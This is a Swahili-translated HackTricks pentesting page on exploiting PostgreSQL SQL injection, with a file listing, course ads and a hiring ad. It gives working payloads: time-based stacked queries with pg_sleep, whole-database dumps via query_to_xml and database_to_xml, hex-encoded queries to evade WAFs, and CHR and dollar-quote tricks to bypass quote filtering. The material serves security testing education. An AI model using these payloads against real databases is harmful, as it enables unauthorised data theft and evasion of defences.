hacktricks/pentesting-web/sql-injection/postgresql-injection
2024-03-29 21:14:28 +00:00
..
big-binary-files-upload-postgresql.md Translated to Swahili 2024-02-11 02:13:58 +00:00
dblink-lo_import-data-exfiltration.md Translated to Swahili 2024-02-11 02:13:58 +00:00
network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md Translated to Swahili 2024-02-11 02:13:58 +00:00
pl-pgsql-password-bruteforce.md Translated to Swahili 2024-02-11 02:13:58 +00:00
rce-with-postgresql-extensions.md Translated to Swahili 2024-02-11 02:13:58 +00:00
rce-with-postgresql-languages.md Translated to Swahili 2024-02-11 02:13:58 +00:00
README.md Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat 2024-03-29 21:14:28 +00:00

Kuingiza kwa PostgreSQL

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa una nia ya kazi ya kuhack na kuhack mambo ambayo hayawezi kuhack - tunatafuta wafanyakazi! (uwezo wa kuandika na kuzungumza Kipolishi kwa ufasaha unahitajika).

{% embed url="https://www.stmcyber.com/careers" %}


Ukurasa huu unalenga kueleza mbinu tofauti ambazo zinaweza kukusaidia kuchexploit SQLinjection iliyopatikana kwenye database ya postgresql na kuzipatia mbinu unazoweza kupata kwenye https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md

Mwingiliano wa Mtandao - Ukarabati wa Mamlaka, Skana ya Bandari, Ufunuo wa Majibu ya Changamoto ya NTLM & Uchukuzi

Moduli ya PostgreSQL dblink inatoa uwezo wa kuunganisha kwenye mifano mingine ya PostgreSQL na kutekeleza uhusiano wa TCP. Vipengele hivi, vikiungwa mkono na utendaji wa COPY FROM, huwezesha hatua kama vile ukarabati wa mamlaka, skanning ya bandari, na kukamata majibu ya changamoto ya NTLM. Kwa njia za kina za kutekeleza mashambulizi haya angalia jinsi ya kutekeleza mashambulizi haya.

Unaweza kusoma mfano huu kuona mfano wa CTF wa jinsi ya kupakia data ndani ya vitu vikubwa na kisha kuchukua yaliyomo ya vitu vikubwa ndani ya jina la mtumiaji wa kazi dblink_connect.

Mashambulizi ya PostgreSQL: Kusoma/kuandika, RCE, privesc

Angalia jinsi ya kuhatarisha mwenyeji na kuongeza mamlaka kutoka PostgreSQL katika:

{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}

Kupitisha WAF

Vipengele vya String vya PostgreSQL

Kubadilisha strings inaweza kukusaidia kupitisha WAFs au vizuizi vingine.
Kwenye ukurasa huu unaweza kupata baadhi ya Vipengele vya Strings vinavyoweza kusaidia.

Mipangilio Iliyopangwa

Kumbuka kwamba postgresql inasaidia mipangilio iliyopangwa, lakini programu kadhaa zitatoa kosa ikiwa majibu 2 yatarudi wakati inatarajia 1 tu. Lakini, bado unaweza kutumia vibaya mipangilio iliyopangwa kupitia Uingizaji wa Wakati:

id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -

Mbinu za XML

query_to_xml

Hii kazi itarudisha data yote katika muundo wa XML katika faili moja tu. Ni bora ikiwa unataka kumwaga data nyingi katika safu moja tu:

SELECT query_to_xml('select * from pg_user',true,true,'');

database_to_xml

Hii function itadump database nzima kwa muundo wa XML katika safu 1 tu (kuwa makini ikiwa database ni kubwa sana kwani unaweza kuisababishia DoS au hata mteja wako mwenyewe):

SELECT database_to_xml(true,true,'');

Strings in Hex

Ikiwa unaweza kuendesha maswali ukiyapitisha ndani ya string (kwa mfano kutumia kazi ya query_to_xml). Unaweza kutumia convert_from kupitisha string kama hex na kuepuka mifumo ya kuchuja njia hii:

select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -

{% endcode %}

Alama za kutumia

Ikiwa huwezi kutumia alama za nukta kwa payload yako unaweza kuzipuuza kwa kutumia CHR kwa ajili ya misemo ya msingi (kuunganisha herufi kazi kwa ajili ya maswali ya msingi kama vile SELECT, INSERT, DELETE, n.k. Hufanyi kazi kwa taarifa zote za SQL):

SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);

Au na $. Hizi kuuliza hurejesha matokeo sawa:

SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;

Ikiwa una nia ya kazi ya udukuzi na kudukua yasiyoweza kudukuliwa - tunakupa kazi! (ujuzi wa Kipolishi wa kuandika na kusema unahitajika).

{% embed url="https://www.stmcyber.com/careers" %}

Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: